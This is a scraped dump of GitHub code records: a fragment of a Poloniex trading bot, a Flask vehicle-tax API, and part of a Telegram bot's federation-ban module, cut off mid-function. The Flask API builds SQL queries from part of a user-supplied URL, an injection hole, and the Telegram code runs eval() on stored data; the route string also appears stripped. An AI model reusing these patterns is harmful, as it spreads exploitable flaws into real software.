polo.returnOrderBook()[pair]['bids'][1][1] # Collect 2nd highest buyorder (1) amount\n\t\t\t\t\t\t\tOrderBidsSum1 = float(OrderBidsAmount1) * float(OrderBidsPrice1) # Calculate 2nd highest buyorder BTC Value\n\t\t\t\t\t\t\tOrderBidsSum01 = float(OrderBidsSum0) + float(OrderBidsSum1) # Calculate 1st & 2nd highest buyorders BTC Value\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tif float(AltSellWorth) >= float(OrderBidsSum01): #Highest BuyOrders (0&1) to small. Calculate for Order 0,1&2\n\t\t\t\t\t\t\t\tprint(\"Order is Bigger than BidsSum01\")\n\t\t\t\t\t\t\t\tOrderBidsPrice2 = polo.returnOrderBook()[pair]['bids'][2][0] # Collect 3nd highest buyorder (2) price\n\t\t\t\t\t\t\t\tOrderBidsAmount2 = polo.returnOrderBook()[pair]['bids'][2][1] # Collect 3nd highest buyorder (2) price\n\t\t\t\t\t\t\t\tOrderBidsSum2 = float(OrderBidsAmount2) * float(OrderBidsPrice2) # Calculate 3rd highest buyorder BTC Value\n\t\t\t\t\t\t\t\tOrderBidsSum012 = float(OrderBidsSum01) + float(OrderBidsSum2) # Calculate 1st 2nd & 3rd highest buyorders BTC Value\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tif float(AltSellWorth) >= float(OrderBidsSum012): #Highest BuyOrders (0,1&2) to small. 
Sell to BuyOrder 0,1,2&3\n\t\t\t\t\t\t\t\t\tprint(\"Order is Bigger than BidsSum012\")\n\t\t\t\t\t\t\t\t\tOrderBidsPrice3 = polo.returnOrderBook()[pair]['bids'][3][0] # Collect 4th highest buyorder (3) price\n\t\t\t\t\t\t\t\t\tOrderBidsAmount3 = polo.returnOrderBook()[pair]['bids'][3][1] # Collect 4th highest buyorder (3) amount\n\t\t\t\t\t\t\t\t\tOrderBidsSum3 = float(OrderBidsAmount3) * float(OrderBidsPrice3) # Calculate 4th highest buyorder BTC Value\n\t\t\t\t\t\t\t\t\tOrderBidsSum0123 = float(OrderBidsSum012) + float(OrderBidsSum3) # Calculate 1st 2nd 3rd & 4th highest buyorders BTC Value\n\t\t\t\t\t\t\t\t\t# Sell to the highest 4 bids (buyorders 0,1,2&3)\n\t\t\t\t\t\t\t\t\tsell = polo.sell(pair, OrderBidsPrice3, AltSell) # Make the SellOrder\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tprint(\"---!SELL Complete!--- fitted in Fourth Bid\")\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tbreak\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\telse: # Sell to the highest 3 bids (BuyOrders 0,1&2)\n\t\t\t\t\t\t\t\t\tsell = polo.sell(pair, OrderBidsPrice2, AltSell) # Make the SellOrder\n\t\t\t\t\t\t\t\t\tprint(\"---!SELL Complete!--- fitted in Third Bid\")\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\telse: # Sell to the highest 2 bids (BuyOrders 0&1)\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tsell = polo.sell(pair, OrderBidsPrice1, AltSell) # Make the SellOrder\n\t\t\t\t\t\t\t\tprint(\"---!SELL Complete!--- fitted in Second Bid\")\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tbreak\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\tbreak # End SELL part (if float(AltWorth) >= float(budget):)\t\t\t\t\n\t\t\t\t\telse: # BUY!!! Compare BuyOrder with Available Asks (same Logic as SELL part where sell=buy & bid=ask)\n\t\t\t\t\t\t#print(\"**BUY** AltWorth LOWER budget\")\n\t\t\t\t\t\tOrderAsksPrice0 = polo.returnOrderBook()[pair]['asks'][0][0]\n\t\t\t\t\t\tOrderAsksAmount0 = polo.returnOrderBook()[pair]['asks'][0][1]\n\t\t\t\t\t\tOrderAsksSum0 = float(OrderAsksAmount0) * float(OrderAsksPrice0)\n\t\t\t\t\t\t\n\t\t\t\t\t\tif float(AltBuyWorth) <= float(OrderAsksSum0): #Order the OrderBook0 \t\t\t\t\t\t\t\n\t\t\t\t\t\t\tbuy = polo.buy(pair, Ask, AltBuy)\n\t\t\t\t\t\t\tprint(\"---!Buy Complete!--- fitted in first Ask\")\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse: #OrderBook0 to small Calculate for Order 0&1\n\t\t\t\t\t\t\tprint(\"Order is Bigger than AsksSum0\")\n\t\t\t\t\t\t\tOrderAsksPrice1 = polo.returnOrderBook()[pair]['asks'][1][0]\n\t\t\t\t\t\t\tOrderAsksAmount1 = polo.returnOrderBook()[pair]['asks'][1][1]\n\t\t\t\t\t\t\tOrderAsksSum1 = float(OrderAsksAmount1) * float(OrderAsksPrice1)\n\t\t\t\t\t\t\tOrderAsksSum01 = float(OrderAsksSum0) + float(OrderAsksSum1)\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tif float(AltBuyWorth) >= float(OrderAsksSum01): #Orderbook 0&1 to small. Order 0,1&2\n\t\t\t\t\t\t\t\tprint(\"Order is Bigger than AsksSum01\")\n\t\t\t\t\t\t\t\tOrderAsksPrice2 = polo.returnOrderBook()[pair]['asks'][2][0]\n\t\t\t\t\t\t\t\tOrderAsksAmount2 = polo.returnOrderBook()[pair]['asks'][2][1]\n\t\t\t\t\t\t\t\tOrderAsksSum2 = float(OrderAsksAmount2) * float(OrderAsksPrice2)\n\t\t\t\t\t\t\t\tOrderAsksSum012 = float(OrderAsksSum01) + float(OrderAsksSum2)\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tif float(AltBuyWorth) >= float(OrderAsksSum012): #Orderbook 01&2 to small. 
Order 0,1,2&3\n\t\t\t\t\t\t\t\t\tprint(\"Order is Bigger than AsksSum012\")\n\t\t\t\t\t\t\t\t\tOrderAsksPrice3 = polo.returnOrderBook()[pair]['asks'][3][0]\n\t\t\t\t\t\t\t\t\tOrderAsksAmount3 = polo.returnOrderBook()[pair]['asks'][3][1]\n\t\t\t\t\t\t\t\t\tOrderAsksSum3 = float(OrderAsksAmount3) * float(OrderAsksPrice3)\n\t\t\t\t\t\t\t\t\tOrderAsksSum0123 = float(OrderAsksSum012) + float(OrderAsksSum3)\n\t\t\t\t\t\t\t\t\tbuy = polo.buy(pair, OrderAsksPrice3, AltBuy)\n\t\t\t\t\t\t\t\t\tprint(\"---!BUY Complete!--- fitted in Fourth Bid\")\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tbreak\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\telse: #Order the Orderbook 01&2\n\t\t\t\t\t\t\t\t\tbuy = polo.buy(pair, OrderAsksPrice2, AltBuy)\n\t\t\t\t\t\t\t\t\tprint(\"---!BUY Complete!--- fitted in Third Bid\")\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\telse: #Order the Orderbook 0&1\n\t\t\t\t\t\t\t\tbuy = polo.buy(pair, OrderAsksPrice1, AltBuy)\n\t\t\t\t\t\t\t\tprint(\"---!BUY Complete!--- fitted in Second Bid\")\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tbreak\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tbreak # end BUY part\t\t\t\t\t\t\n\t\t\t\tbreak # end of try\n\t\t\texcept:\n\t\t\t\tbackoff(\"Can not finish the OrderBook\")\n\t\t\t\texit(1)\t\t\t\n\t\t\n\t\tprint(\" \")\n\t\tcounter = counter + 1\n","repo_name":"malikhodaei/PoloniexTradeBot","sub_path":"AllCoinsInBTC.py","file_name":"AllCoinsInBTC.py","file_ext":"py","file_size_in_byte":12188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"42"} +{"seq_id":"73295762686","text":"from flask import Flask, jsonify\nimport sqlite3\nfrom datetime import date, timedelta\nfrom bikram import samwat\n\napp = Flask(__name__)\n\n@app.route('////', methods = ['GET'])\n\ndef get(vehicle_registration_type, vehicle, cubic_centimeter_capacity, valid_upto):\n\tx = calculate(vehicle_registration_type, vehicle, cubic_centimeter_capacity, valid_upto)\n\n\treturn jsonify({\"Amount Due\" : x[0], 'Valid Upto' : x[1]}), 200\n\ndef calculate(vehicle_registration_type, vehicle, cubic_centimeter_capacity, valid_upto):\n\t\n\tdates = list((valid_upto.split('-')))\n\n\tsmall_vehicle = ['CAR', 'JEEP', 'VAN', 'MICRO-BUS']\n\tpower_vehicle = ['DOZER', 'EXCAVATOR', 'LOADER', 'ROLLER', 'TIPPER', 'CRANE', 'MINI-TIPPER', 'TRACTOR', 'POWER-TILLER', 'MINI-TRUCK', 'MINI-BUS', 'BUS', 'TRUCK']\n\tvehicle = vehicle.upper()\n\ttax = int()\n\n\tif(int(dates[2]) == 2076):\n\t\tyear = '_' + '2075'\n\n\telse:\n\t\tyear = '_' + dates[2]\t\t\n\n\tif vehicle_registration_type == 'private':\n\t\tdatabase_link = sqlite3.connect('private.db')\n\t\t\t\n\telif vehicle_registration_type == 'public':\n\t\tdatabase_link = sqlite3.connect('public.db')\n\t\t\t\n\tif vehicle == 'MOTORCYCLE':\n\t\tcursor = database_link.execute('SELECT CC_BEG, CC_END, ' + year + ' FROM MOTORCYCLE')\n\t\t\t\n\t\tfor row in cursor:\n\t\t\tif cubic_centimeter_capacity >= row[0] and cubic_centimeter_capacity <= row[1]:\n\t\t\t\ttax = row[2]\n\t\t\t\n\telif vehicle in small_vehicle:\n\t\tcursor = database_link.execute('SELECT CC_BEG, CC_END, ' + year + ' FROM SMALL_VEH')\n\t\t\t\t\t\n\t\tfor row in cursor:\n\t\t\tif(row[0] <= cubic_centimeter_capacity and row[1] >= cubic_centimeter_capacity):\n\t\t\t\ttax = row[2]\t\t\n\t\t\t\n\telif vehicle in power_vehicle:\n\t\tcursor = database_link.execute('SELECT TYPE, ' + year + ' FROM POWER_VEH')\n\t\t\t\n\t\tfor row in cursor:\n\t\t\tif row[0] == vehicle:\n\t\t\t\ttax = row[1]\n\n\ttemp = valid_upto\n\tvalid_upto = 
samwat(int(dates[2]), int(dates[1]), int(dates[0]))\n\tcurrent_date = samwat.from_ad(date.today())\n\n\tvalidity = valid_upto + timedelta(days = 365)\n\tvalidity = validity.as_tuple()\n\tvalidity = str(validity[2]) + '-' + str(validity[1]) + '-' + str(validity[0])\n\n\tnumber_of_days_left = current_date - valid_upto\n\tnumber_of_days_left = number_of_days_left.days\n\n\tif number_of_days_left <= 0:\n\t\treturn 0, temp\n\n\tpenalty_free_date = valid_upto.as_tuple()\n\n\tif(penalty_free_date[1] + 3 > 12):\n\t\tpenalty_free_date = samwat(penalty_free_date[0]+1, 1, 1)\n\t\tpenalty_free_date = penalty_free_date - timedelta(days = 1)\n\n\telse:\n\t\tpenalty_free_date = samwat(penalty_free_date[0], penalty_free_date[1] + 3, penalty_free_date[2])\n\n\tif(penalty_free_date >= current_date):\n\t\treturn tax, validity\n\n\tdays_exceeded = current_date - penalty_free_date;\n\tdays_exceeded = days_exceeded.days\n\n\tif days_exceeded <= 30:\n\t\ttax = tax + (0.05 * tax)\n\n\telif days_exceeded <= 45:\n\t\ttax = tax + (0.1 * tax)\n\n\telse:\n\t\tcurrent_date = current_date.as_tuple()\n\n\t\tif current_date[0] == int(dates[2]):\n\t\t\ttax = tax + (0.2 * tax)\n\n\t\telse:\n\t\t\ttax = tax + (0.32 * tax)\n\n\treturn tax, validity\n","repo_name":"akshat00/VEHICLE-TAX-API","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"14382683114","text":"import html\nfrom io import BytesIO\nfrom typing import Optional, List\nimport random\nimport uuid\nimport re\nimport json\nimport time\nfrom time import sleep\n\nfrom future.utils import string_types\nfrom telegram.error import BadRequest, TelegramError, Unauthorized\nfrom telegram import ParseMode, Update, Bot, Chat, User, MessageEntity, InlineKeyboardMarkup, InlineKeyboardButton\nfrom telegram.ext import run_async, CommandHandler, MessageHandler, Filters, CallbackQueryHandler\nfrom telegram.utils.helpers import escape_markdown, mention_html, mention_markdown\n\nfrom haruka import dispatcher, OWNER_ID, SUDO_USERS, WHITELIST_USERS, MESSAGE_DUMP, LOGGER\nfrom haruka.modules.helper_funcs.handlers import CMD_STARTERS\nfrom haruka.modules.helper_funcs.misc import is_module_loaded, send_to_list\nfrom haruka.modules.helper_funcs.chat_status import is_user_admin\nfrom haruka.modules.helper_funcs.extraction import extract_user, extract_user_and_text\nfrom haruka.modules.helper_funcs.string_handling import markdown_parser\nfrom haruka.modules.disable import DisableAbleCommandHandler\n\nimport haruka.modules.sql.feds_sql as sql\n\n# Hello bot owner, I spended for feds many hours of my life, Please don't remove this if you still respect MrYacha and peaktogoo and AyraHikari too\n# Federation by MrYacha 2018-2019\n# Federation rework by Mizukito Akito 2019\n# Federation update v2 by Ayra Hikari 2019\n#\n# Time spended on feds = 10h by #MrYacha\n# Time spended on reworking on the whole feds = 22+ hours by @RealAkito\n# Time spended on updating version to v2 = 26+ hours by @AyraHikari\n#\n# Total spended for making this features is 68+ hours\n\nLOGGER.info(\"Original federation module by MrYacha, reworked by Mizukito Akito (@RealAkito) on Telegram.\")\n\n\nFBAN_ERRORS = {\n\t\"User is an administrator of the chat\",\n\t\"Chat not found\",\n\t\"Not enough rights to restrict/unrestrict chat member\",\n\t\"User_not_participant\",\n\t\"Peer_id_invalid\",\n\t\"Group chat was deactivated\",\n\t\"Need to be inviter of a user to kick it from a basic 
group\",\n\t\"Chat_admin_required\",\n\t\"Only the creator of a basic group can kick group administrators\",\n\t\"Channel_private\",\n\t\"Not in the chat\",\n\t\"Have no rights to send a message\"\n}\n\nUNFBAN_ERRORS = {\n\t\"User is an administrator of the chat\",\n\t\"Chat not found\",\n\t\"Not enough rights to restrict/unrestrict chat member\",\n\t\"User_not_participant\",\n\t\"Method is available for supergroup and channel chats only\",\n\t\"Not in the chat\",\n\t\"Channel_private\",\n\t\"Chat_admin_required\",\n\t\"Have no rights to send a message\"\n}\n\n@run_async\ndef new_fed(bot: Bot, update: Update):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\tmessage = update.effective_message\n\tif chat.type != \"private\":\n\t\tupdate.effective_message.reply_text(\"Do it in PM?\")\n\t\treturn\n\tfednam = message.text.split(None, 1)[1]\n\tif not fednam == '':\n\t\tfed_id = str(uuid.uuid4())\n\t\tfed_name = fednam\n\t\tLOGGER.info(fed_id)\n\t\tif user.id == int(OWNER_ID):\n\t\t\tfed_id = fed_name\n\n\t\tx = sql.new_fed(user.id, fed_name, fed_id)\n\t\tif not x:\n\t\t\tupdate.effective_message.reply_text(\"Federation creation failed! Keep in the mind that this rarely happened! Ask in @HarukaAyaGroup for help!\")\n\t\t\treturn\n\n\t\tupdate.effective_message.reply_text(\"*You have successfully created a new federation!*\"\\\n\t\t\t\t\t\t\t\t\t\t\t\"\\nName: `{}`\"\\\n\t\t\t\t\t\t\t\t\t\t\t\"\\nID: `{}`\"\n\t\t\t\t\t\t\t\t\t\t\t\"\\n\\nUse the command below to join the federation:\"\n\t\t\t\t\t\t\t\t\t\t\t\"\\n`/joinfed {}`\".format(fed_name, fed_id, fed_id), parse_mode=ParseMode.MARKDOWN)\n\t\ttry:\n\t\t\tbot.send_message(MESSAGE_DUMP,\n\t\t\t\t\"Federation {} have been created with ID:
{}
\".format(fed_name, fed_id), parse_mode=ParseMode.HTML)\n\t\texcept:\n\t\t\tLOGGER.warning(\"Cannot send a message to MESSAGE_DUMP\")\n\telse:\n\t\tupdate.effective_message.reply_text(\"Please write down the name of the federation\")\n\n@run_async\ndef del_fed(bot: Bot, update: Update, args: List[str]):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\tif chat.type != \"private\":\n\t\tupdate.effective_message.reply_text(\"You can only delete federation in PM!\")\n\t\treturn\n\tif args:\n\t\tis_fed_id = args[0]\n\t\tgetinfo = sql.get_fed_info(is_fed_id)\n\t\tif getinfo == False:\n\t\t\tupdate.effective_message.reply_text(\"This federation is not found\")\n\t\t\treturn\n\t\tif int(getinfo['owner']) == int(user.id):\n\t\t\tfed_id = is_fed_id\n\t\telse:\n\t\t\tupdate.effective_message.reply_text(\"Only federation owners can do this!\")\n\t\t\treturn\n\telse:\n\t\tupdate.effective_message.reply_text(\"What should I delete?\")\n\t\treturn\n\n\tif is_user_fed_owner(fed_id, user.id) == False:\n\t\tupdate.effective_message.reply_text(\"Only federation owners can do this!\")\n\t\treturn\n\n\tupdate.effective_message.reply_text(\"Are you sure you want to delete your federation? This action cannot be canceled, you will lose your entire ban list, and '{}' will be permanently lost.\".format(getinfo['fname']),\n\t\t\treply_markup=InlineKeyboardMarkup(\n\t\t\t\t\t\t[[InlineKeyboardButton(text=\"⚠️ Remove Federation ⚠️\", callback_data=\"rmfed_{}\".format(fed_id))],\n\t\t\t\t\t\t[InlineKeyboardButton(text=\"Cancel\", callback_data=\"rmfed_cancel\")]]))\n\n@run_async\ndef fed_chat(bot: Bot, update: Update, args: List[str]):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\tfed_id = sql.get_fed_id(chat.id)\n\n\tuser_id = update.effective_message.from_user.id\n\tif not is_user_admin(update.effective_chat, user_id):\n\t\tupdate.effective_message.reply_text(\"You must be an admin to execute this command\")\n\t\treturn\n\n\tif not fed_id:\n\t\tupdate.effective_message.reply_text(\"This group is not in any federation!\")\n\t\treturn\n\n\tuser = update.effective_user # type: Optional[Chat]\n\tchat = update.effective_chat # type: Optional[Chat]\n\tinfo = sql.get_fed_info(fed_id)\n\n\ttext = \"This chat is part of the following federation:\"\n\ttext += \"\\n{} (ID: {})\".format(info['fname'], fed_id)\n\n\tupdate.effective_message.reply_text(text, parse_mode=ParseMode.HTML)\n\n\ndef join_fed(bot: Bot, update: Update, args: List[str]):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n message = update.effective_message\n administrators = chat.get_administrators()\n fed_id = sql.get_fed_id(chat.id)\n\n if user.id in SUDO_USERS:\n pass\n else:\n for admin in administrators:\n status = admin.status\n if status == \"creator\":\n print(admin)\n if str(admin.user.id) == str(user.id):\n pass\n else:\n update.effective_message.reply_text(\"Only group creator can do it!\")\n return\n if fed_id:\n message.reply_text(\"Uh, Are you gonna join two federations at one chat?\")\n return\n\n if len(args) >= 1:\n fedd = args[0]\n print(fedd)\n if sql.search_fed_by_id(fedd) == False:\n message.reply_text(\"Please enter valid federation id.\")\n return\n\n x = sql.chat_join_fed(fedd, chat.id)\n if not x:\n message.reply_text(\"Failed to join to federation! 
Due to some errors that basically I have no idea, try reporting it in support group!\")\n return\n\n message.reply_text(\"Chat joined to federation!\")\n\n\n@run_async\ndef leave_fed(bot: Bot, update: Update, args: List[str]):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\tfed_id = sql.get_fed_id(chat.id)\n\tfed_info = sql.get_fed_info(fed_id)\n\n\t# administrators = chat.get_administrators().status\n\tgetuser = bot.get_chat_member(chat.id, user.id).status\n\tif getuser in 'creator' or user.id in SUDO_USERS:\n\t\tif sql.chat_leave_fed(chat.id) == True:\n\t\t\tupdate.effective_message.reply_text(\"This chat has left the federation: {}!\".format(fed_info['fname']))\n\t\telse:\n\t\t\tupdate.effective_message.reply_text(\"How can you leave a federation that you never joined?!\")\n\telse:\n\t\tupdate.effective_message.reply_text(\"Only group creators can use this command!\")\n\n@run_async\ndef user_join_fed(bot: Bot, update: Update, args: List[str]):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\tmsg = update.effective_message # type: Optional[Message]\n\tfed_id = sql.get_fed_id(chat.id)\n\n\tif is_user_fed_owner(fed_id, user.id):\n\t\tuser_id = extract_user(msg, args)\n\t\tif user_id:\n\t\t\tuser = bot.get_chat(user_id)\n\t\telif not msg.reply_to_message and not args:\n\t\t\tuser = msg.from_user\n\t\telif not msg.reply_to_message and (not args or (\n\t\t\tlen(args) >= 1 and not args[0].startswith(\"@\") and not args[0].isdigit() and not msg.parse_entities(\n\t\t\t[MessageEntity.TEXT_MENTION]))):\n\t\t\tmsg.reply_text(\"I cannot extract users from this message\")\n\t\t\treturn\n\t\telse:\n\t\t\tLOGGER.warning('error')\n\t\tgetuser = sql.search_user_in_fed(fed_id, user_id)\n\t\tfed_id = sql.get_fed_id(chat.id)\n\t\tinfo = sql.get_fed_info(fed_id)\n\t\tget_owner = eval(info['fusers'])['owner']\n\t\tget_owner = bot.get_chat(get_owner).id\n\t\tif user_id == get_owner:\n\t\t\tupdate.effective_message.reply_text(\"Why are you trying to promote a federation owner?\")\n\t\t\treturn\n\t\tif getuser:\n\t\t\tupdate.effective_message.reply_text(\"I cannot promote users who are already federation admins! 
But I can remove them if you want!\")\n\t\t\treturn\n\t\tif user_id == bot.id:\n\t\t\tupdate.effective_message.reply_text(\"I already am a federation admin in all federations!\")\n\t\t\treturn\n\t\tres = sql.user_join_fed(fed_id, user_id)\n\t\tif res:\n\t\t\tupdate.effective_message.reply_text(\"Successfully Promoted!\")\n\t\telse:\n\t\t\tupdate.effective_message.reply_text(\"Failed to promote!\")\n\telse:\n\t\tupdate.effective_message.reply_text(\"Only federation owners can do this!\")\n\n\n@run_async\ndef user_demote_fed(bot: Bot, update: Update, args: List[str]):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\tfed_id = sql.get_fed_id(chat.id)\n\n\tif is_user_fed_owner(fed_id, user.id):\n\t\tmsg = update.effective_message # type: Optional[Message]\n\t\tuser_id = extract_user(msg, args)\n\t\tif user_id:\n\t\t\tuser = bot.get_chat(user_id)\n\n\t\telif not msg.reply_to_message and not args:\n\t\t\tuser = msg.from_user\n\n\t\telif not msg.reply_to_message and (not args or (\n\t\t\tlen(args) >= 1 and not args[0].startswith(\"@\") and not args[0].isdigit() and not msg.parse_entities(\n\t\t\t[MessageEntity.TEXT_MENTION]))):\n\t\t\tmsg.reply_text(\"I cannot extract users from this message\")\n\t\t\treturn\n\t\telse:\n\t\t\tLOGGER.warning('error')\n\n\t\tif user_id == bot.id:\n\t\t\tupdate.effective_message.reply_text(\"Are you trying to demote me as a federation admin? Do you think I am stupid?\")\n\t\t\treturn\n\n\t\tif sql.search_user_in_fed(fed_id, user_id) == False:\n\t\t\tupdate.effective_message.reply_text(\"I cannot demote people who are not federation admins!\")\n\t\t\treturn\n\n\t\tres = sql.user_demote_fed(fed_id, user_id)\n\t\tif res == True:\n\t\t\tupdate.effective_message.reply_text(\"Get out of here!\")\n\t\telse:\n\t\t\tupdate.effective_message.reply_text(\"Demotion failed!\")\n\telse:\n\t\tupdate.effective_message.reply_text(\"Only federation owners can do this!\")\n\t\treturn\n\n@run_async\ndef fed_info(bot: Bot, update: Update, args: List[str]):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\tfed_id = sql.get_fed_id(chat.id)\n\tinfo = sql.get_fed_info(fed_id)\n\n\tif not fed_id:\n\t\tupdate.effective_message.reply_text(\"This group is not in any federation!\")\n\t\treturn\n\n\tif is_user_fed_admin(fed_id, user.id) == False:\n\t\tupdate.effective_message.reply_text(\"Only a federation admin can do this!\")\n\t\treturn\n\n\towner = bot.get_chat(info['owner'])\n\ttry:\n\t\towner_name = owner.first_name + \" \" + owner.last_name\n\texcept:\n\t\towner_name = owner.first_name\n\tFEDADMIN = sql.all_fed_users(fed_id)\n\tFEDADMIN.append(int(owner.id))\n\tTotalAdminFed = len(FEDADMIN)\n\n\tuser = update.effective_user # type: Optional[Chat]\n\tchat = update.effective_chat # type: Optional[Chat]\n\tinfo = sql.get_fed_info(fed_id)\n\n\ttext = \"ℹ️ Federation Information:\"\n\ttext += \"\\nFedID: {}\".format(fed_id)\n\ttext += \"\\nName: {}\".format(info['fname'])\n\ttext += \"\\nCreator: {}\".format(mention_html(owner.id, owner_name))\n\ttext += \"\\nAll Admins: {}\".format(TotalAdminFed)\n\tgetfban = sql.get_all_fban_users(fed_id)\n\ttext += \"\\nTotal banned users: {}\".format(len(getfban))\n\tgetfchat = sql.all_fed_chats(fed_id)\n\ttext += \"\\nNumber of groups in this federation: {}\".format(len(getfchat))\n\n\tupdate.effective_message.reply_text(text, parse_mode=ParseMode.HTML)\n\n@run_async\ndef fed_admin(bot: Bot, update: Update, args: List[str]):\n\tchat 
= update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\tfed_id = sql.get_fed_id(chat.id)\n\n\tif not fed_id:\n\t\tupdate.effective_message.reply_text(\"This group is not in any federation!\")\n\t\treturn\n\n\tif is_user_fed_admin(fed_id, user.id) == False:\n\t\tupdate.effective_message.reply_text(\"Only federation admins can do this!\")\n\t\treturn\n\n\tuser = update.effective_user # type: Optional[Chat]\n\tchat = update.effective_chat # type: Optional[Chat]\n\tinfo = sql.get_fed_info(fed_id)\n\n\ttext = \"Federation Admin {}:\\n\\n\".format(info['fname'])\n\ttext += \"👑 Owner:\\n\"\n\towner = bot.get_chat(info['owner'])\n\ttry:\n\t\towner_name = owner.first_name + \" \" + owner.last_name\n\texcept:\n\t\towner_name = owner.first_name\n\ttext += \" • {}\\n\".format(mention_html(owner.id, owner_name))\n\n\tmembers = sql.all_fed_members(fed_id)\n\tif len(members) == 0:\n\t\ttext += \"\\n🔱 There is no admin in this federation\"\n\telse:\n\t\ttext += \"\\n🔱 Admin:\\n\"\n\t\tfor x in members:\n\t\t\tuser = bot.get_chat(x) \n\t\t\ttext += \" • {}\\n\".format(mention_html(user.id, user.first_name))\n\n\tupdate.effective_message.reply_text(text, parse_mode=ParseMode.HTML)\n\n\n@run_async\ndef fed_ban(bot: Bot, update: Update, args: List[str]):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\tfed_id = sql.get_fed_id(chat.id)\n\n\tif not fed_id:\n\t\tupdate.effective_message.reply_text(\"This group is not a part of any federation!\")\n\t\treturn\n\n\tinfo = sql.get_fed_info(fed_id)\n\tOW = bot.get_chat(info['owner'])\n\tHAHA = OW.id\n\tFEDADMIN = sql.all_fed_users(fed_id)\n\tFEDADMIN.append(int(HAHA))\n\n\tif is_user_fed_admin(fed_id, user.id) == False:\n\t\tupdate.effective_message.reply_text(\"Only federation admins can do this!\")\n\t\treturn\n\n\tmessage = update.effective_message # type: Optional[Message]\n\n\tuser_id, reason = extract_user_and_text(message, args)\n\n\tfban, fbanreason = sql.get_fban_user(fed_id, user_id)\n\n\tif not user_id:\n\t\tmessage.reply_text(\"You don't seem to be referring to a user\")\n\t\treturn\n\n\tif user_id == bot.id:\n\t\tmessage.reply_text(\"What is funnier than kicking the group creator? 
Self sacrifice.\")\n\t\treturn\n\n\tif is_user_fed_owner(fed_id, user_id) == True:\n\t\tmessage.reply_text(\"Why did you try the federation fban?\")\n\t\treturn\n\n\tif is_user_fed_admin(fed_id, user_id) == True:\n\t\tmessage.reply_text(\"He is a federation admin, I can't fban him.\")\n\t\treturn\n\n\tif user_id == OWNER_ID:\n\t\tmessage.reply_text(\"I don't want to block my master, that's a very stupid idea!\")\n\t\treturn\n\n\tif int(user_id) in SUDO_USERS:\n\t\tmessage.reply_text(\"I will not use sudo fban!\")\n\t\treturn\n\n\tif int(user_id) in WHITELIST_USERS:\n\t\tmessage.reply_text(\"This person is whitelisted, so they can't be fban!\")\n\t\treturn\n\n\ttry:\n\t\tuser_chat = bot.get_chat(user_id)\n\texcept BadRequest as excp:\n\t\tmessage.reply_text(excp.message)\n\t\treturn\n\n\tif user_chat.type != 'private':\n\t\tmessage.reply_text(\"That's not a user!\")\n\t\treturn\n\n\tif fban:\n\t\tuser_target = mention_html(user_chat.id, user_chat.first_name)\n\t\tfed_name = info['fname']\n\t\tstarting = \"The reason fban is replaced for {} in the Federation {}.\".format(user_target, fed_name)\n\t\tupdate.effective_message.reply_text(starting, parse_mode=ParseMode.HTML)\n\n\t\tif reason == \"\":\n\t\t\treason = \"No reason given.\"\n\n\t\ttemp = sql.un_fban_user(fed_id, user_id)\n\t\tif not temp:\n\t\t\tmessage.reply_text(\"Failed to update the reason for fedban!\")\n\t\t\treturn\n\t\tx = sql.fban_user(fed_id, user_id, user_chat.first_name, user_chat.last_name, user_chat.username, reason)\n\t\tif not x:\n\t\t\tmessage.reply_text(\"Failed to ban from the federation! If this problem continues, contact @onepunchsupport.\")\n\t\t\treturn\n\n\t\tfed_chats = sql.all_fed_chats(fed_id)\n\t\tfor chat in fed_chats:\n\t\t\ttry:\n\t\t\t\tbot.kick_chat_member(chat, user_id)\n\t\t\texcept BadRequest as excp:\n\t\t\t\tif excp.message in FBAN_ERRORS:\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tLOGGER.warning(\"Could not fban on {} because: {}\".format(chat, excp.message))\n\t\t\texcept TelegramError:\n\t\t\t\tpass\n\n\t\tsend_to_list(bot, FEDADMIN,\n\t\t\t\t \"FedBan reason updated\" \\\n\t\t\t\t\t\t\t \"\\nFederation: {}\" \\\n\t\t\t\t\t\t\t \"\\nFederation Admin: {}\" \\\n\t\t\t\t\t\t\t \"\\nUser: {}\" \\\n\t\t\t\t\t\t\t 